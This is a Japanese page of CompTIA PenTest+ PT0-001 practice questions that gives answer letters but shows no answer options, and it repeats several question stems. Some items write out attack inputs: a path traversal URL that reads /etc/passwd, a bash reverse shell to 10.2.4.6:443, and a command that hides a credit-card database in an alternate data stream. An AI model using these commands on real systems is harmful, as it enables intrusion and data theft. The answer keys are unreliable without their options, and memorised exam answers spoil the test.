最新的CompTIA PenTest+ Certification Exam (PT0-001日本語版) - PT0-001日本語免費考試真題
問題1
ペネトレーションテスターは、ブラウザのURLに次の情報を入力しました。
https://www.example.com/login.php?file=../../../../../../../etc/passwd
サーバーは、サーバーの機密データファイルに含まれているデータで応答しました。次のタイプの脆弱性のうち、最も悪用される可能性が高いのはどれですか?
https://www.example.com/login.php?file=../../../../../../../etc/passwd
サーバーは、サーバーの機密データファイルに含まれているデータで応答しました。次のタイプの脆弱性のうち、最も悪用される可能性が高いのはどれですか?
正確答案: D
問題2
エグゼクティブサマリーの調査結果と推奨事項を優先しながら、次の考慮事項のうちどれがクライアントにとって有益でしょうか。
正確答案: C
問題3
Webアプリケーション内のローカルファイルインクルードの脆弱性を悪用した後、制限されたリバースシェルが侵入テスターのワークステーションにスポーンされます。制限されたシェルをエスケープして完全に機能するTTYを作成するために使用できるのは次のうちどれですか。
正確答案: C
問題4
ペネトレーションテスタがアプリケーションの脆弱性を悪用したため、Linuxセッションからコマンド履歴を削除したいと考えています。次のうちどれがこれを成功させるのでしょうか?
正確答案: D
問題5
侵入テスト担当者は、システムに「ゴースト」の脆弱性が存在するかどうかを手動で確認したいと考えています。脆弱性を検証する正しい方法は次のうちどれですか?
正確答案: B
問題6
テスターは、ターゲットシステムで次のコマンドを実行しようとしています。
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
次の追加のコマンドのどれが前のコマンドを成功させるためにテスターのLinuxシステム上で実行される必要があるでしょうか?
bash -i >& /dev/tcp/10.2.4.6/443 0> &1
次の追加のコマンドのどれが前のコマンドを成功させるためにテスターのLinuxシステム上で実行される必要があるでしょうか?
正確答案: C
問題7
ペネトレーションテスターは、一部のターゲットでSNMPを検出します。ペネトレーションテスターが最初に試すべきものは次のうちどれですか?
正確答案: D
問題8
次のうちどれがセキュリティ評価の予算に直接的かつ重大な影響を与えますか?
正確答案: B
問題9
侵入テスト担当者は、テキストボックスにSQLインジェクションコマンドを入力して、データベース上のインフォメーションストアにアクセスすることができました。次のうちどれが脆弱性を緩和するための最良の推奨ですか?
正確答案: D
問題10
環境内のすべてのWebサーバーの最近の脆弱性スキャンでは、次の結果が得られます。

リスクベースのアプローチを取る場合、エクスポージャーに基づいて修復にアプローチするための最良の順序は次のうちどれですか?

リスクベースのアプローチを取る場合、エクスポージャーに基づいて修復にアプローチするための最良の順序は次のうちどれですか?
正確答案: B
問題11
次のうちどれがターゲットの外部ドメインで受動的偵察を実行するための最善でしょうか?
正確答案: A
問題12
ペネトレーションテスターはWebアプリケーションをテストしており、特権の低いユーザーとしてログインしています。テスターはアプリケーション内で任意のJavaScriptを実行し、XMLHttpRequestを送信して、管理者のみがアクセスできる機能を利用します。
次のコントロールのうち、脆弱性を最も軽減するのはどれですか?
次のコントロールのうち、脆弱性を最も軽減するのはどれですか?
正確答案: C
問題13
悪用後、テスターは、システムバイナリのみが出力フィルターを通過し、次のコマンドでファイルを保存することを識別します。
c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db
このコマンドが利用するファイルシステムの脆弱性は次のうちどれですか?
c: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db
このコマンドが利用するファイルシステムの脆弱性は次のうちどれですか?
正確答案: B

